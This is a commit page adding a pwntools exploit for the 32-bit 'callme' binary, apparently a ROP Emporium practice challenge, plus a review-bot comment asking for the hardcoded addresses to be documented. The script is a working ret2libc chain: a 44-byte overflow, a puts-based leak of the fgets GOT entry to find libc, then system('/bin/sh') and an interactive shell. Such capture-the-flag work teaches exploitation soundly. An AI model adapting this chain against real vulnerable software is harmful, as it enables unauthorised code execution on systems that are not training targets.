
exploit for 32-bit callme binary
AravGarg authored Mar 28, 2020
1 parent dedaf16 commit 17bacfd
Showing 1 changed file with 35 additions and 0 deletions.
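--- a/callme32.py
+++ b/callme32.py
@@ -0,0 +1,35 @@
+from pwn import *
+target=process('./callme32')
+elf=ELF('callme32')
+libc=elf.libc
+
+print(target.recvuntil("...\n> "))
+fgets_got=0x0804a010
+puts_plt=0x080485d0
+popret=0x08048579
+pwnme=0x080487B6
+
+payload="A"*44
+payload+=p32(puts_plt)
+payload+=p32(popret)
+payload+=p32(fgets_got)
+payload+=p32(pwnme)
+payload+=p32(0x0)
+
+target.sendline(payload)
+leak=target.recv()[0:4]
+libc_fgets=u32(leak+"\x00"*(4-len(leak)))
+print(hex(libc_fgets))
+libc_base=libc_fgets-libc.symbols["fgets"]
+print(hex(libc_base))
+libc_system=libc_base+libc.symbols["system"]
+libc_binsh=libc_base+libc.search("/bin/sh\x00").next()
+
+payload="A"*44
+payload+=p32(libc_system)
+payload+=p32(0xdeadbeef)
+payload+=p32(libc_binsh)
+payload+=p32(0x0)
+
+target.sendline(payload)
+target.interactive()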
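Review bot: The four addresses assigned to `fgets_got`, `puts_plt`, `popret` and `pwnme` are bare hex literals with no record of how they were obtained, so a reader cannot tell whether they belong to this particular build of callme32 or must be re-derived for another one. A one-line comment above the group, e.g. `# build-specific addresses for this callme32 binary; see write-up for how they were read out`, would make the script reproducible as documentation rather than a snapshot. The same applies to the `44` in `"A"*44`, which is used twice and would be clearer as a named constant with a comment stating what it measures.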
